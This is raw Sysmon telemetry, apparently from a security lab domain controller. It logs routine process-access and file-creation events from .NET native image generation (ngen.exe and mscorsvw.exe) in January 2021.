13:46:17.484{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9129-6005-BC01-00000000A301}4584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:17.390{59A5CD1D-9128-6005-BB01-00000000A301}3260C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\cbc-0\Microsoft.Internal.Tasks.Dataflow.dll2021-01-18 13:46:17.390 10341000x80000000000000006001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.468{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C701-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.453{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C701-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.453{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C701-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C601-00000000A301}2368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.390{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C601-00000000A301}2368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.390{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C601-00000000A301}2368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.171{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C501-00000000A301}4412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.171{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C501-00000000A301}4412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.171{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C501-00000000A301}4412C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.109{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C401-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.093{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C401-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.093{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C401-00000000A301}884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C301-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.062{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C301-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C301-00000000A301}3108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.015{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912A-6005-C201-00000000A301}2604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:18.015{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912A-6005-C201-00000000A301}2604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:18.015{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912A-6005-C201-00000000A301}2604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.687{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912B-6005-CF01-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:19.671{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912B-6005-CF01-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:19.671{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912B-6005-CF01-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
